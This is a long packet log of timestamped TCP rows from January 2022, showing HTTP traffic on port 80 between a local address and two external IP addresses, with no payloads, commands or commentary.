Jan 9, 2022 18:48:39.714520931 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714545012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714565992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714585066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714623928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714657068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714679003 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714699030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714736938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714740992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714776039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714793921 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714809895 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714814901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714853048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.714883089 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.714956999 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.730808020 CET	80	49857	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.730855942 CET	80	49857	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.731092930 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.731137037 CET	49857	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.758238077 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.909252882 CET	80	49857	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.936989069 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:39.937181950 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.937357903 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.937427998 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:39.969449043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969508886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969552994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969594955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969635963 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969676018 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969708920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.969719887 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969760895 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969786882 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.969801903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969844103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969846964 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.969882011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969926119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.969934940 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.969965935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970004082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970005989 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970045090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970076084 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970083952 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970127106 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970165968 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970166922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970206022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970247030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970284939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970323086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970324039 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970364094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970386982 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970403910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970438957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970477104 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970479012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970515966 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970552921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.970591068 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.970701933 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971246004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971288919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971328974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971370935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971410990 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971451998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971456051 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971491098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971535921 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971554041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971596956 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971633911 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971633911 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971674919 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971714973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971716881 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971755028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971792936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971796036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971833944 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971872091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971910000 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971913099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971954107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.971990108 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.971992970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972033024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972042084 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972071886 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972117901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972156048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972158909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972197056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972229958 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972243071 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972266912 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972304106 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972306967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972347021 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972359896 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972385883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972425938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972435951 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972465038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972505093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972512007 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.972533941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.972608089 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973050117 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973093033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973134041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973167896 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973172903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973185062 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973212957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973253012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973290920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973306894 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973331928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973345995 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973371983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973411083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973423958 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973452091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973490953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973529100 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973568916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973586082 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973604918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973644972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973661900 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973683119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973722935 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973762989 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973777056 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973800898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973815918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973839998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973880053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973923922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973937035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.973964930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.973998070 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:39.974051952 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:39.974726915 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034104109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034162998 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034195900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034224033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034265995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034306049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034311056 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034344912 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034387112 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034426928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034430981 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034465075 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034497023 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034506083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034545898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034560919 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034585953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034626007 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034626961 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034662962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034703970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.034749985 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.034838915 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.115951061 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.116015911 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.211934090 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212014914 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212060928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212100983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212141991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212179899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212179899 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.212220907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212260962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212299109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212297916 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.212338924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212379932 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212419033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.212451935 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.212555885 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233292103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233334064 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233374119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233412981 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233454943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233464956 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233495951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233505011 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233535051 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233576059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233608007 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233617067 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233655930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233673096 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233695030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233735085 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233751059 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233776093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233817101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233819008 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233856916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233896971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233946085 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.233956099 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.233985901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234025955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234046936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234065056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234103918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234108925 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234143019 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234175920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234181881 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234224081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234257936 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234266996 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234299898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234335899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234353065 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234432936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.234890938 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234991074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.234993935 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235032082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235074043 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235114098 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235120058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235158920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235198975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235208988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235239029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235280037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235297918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235320091 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235358953 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235369921 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235399008 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235440016 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235462904 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235477924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235517979 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235537052 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235558033 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235594988 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235611916 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235635042 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235673904 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235678911 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235713959 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235749960 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235754013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235793114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235833883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235835075 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235874891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.235956907 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.235959053 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236000061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236041069 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236047983 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.236078024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236149073 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.236782074 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236896992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.236948013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.236989975 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237030983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237071991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237109900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237128973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237149954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237193108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237226009 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237232924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237272978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237313986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237350941 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237351894 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237392902 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237432003 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237462044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237495899 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237503052 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237514973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237545013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237586021 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237596035 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237623930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237658024 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237663031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237704039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237719059 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237741947 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237781048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237802982 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237819910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237854004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237894058 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237898111 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237931967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.237955093 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.237974882 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.238013983 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.238045931 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.238127947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.238416910 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.239679098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239720106 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239761114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239803076 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239811897 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.239840984 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239880085 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239891052 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.239921093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.239953995 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.239959955 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240000010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240036011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240047932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.240077972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240118980 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240118980 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.240149021 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.240235090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.244704008 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.448910952 CET	80	49854	211.169.6.249	192.168.2.3
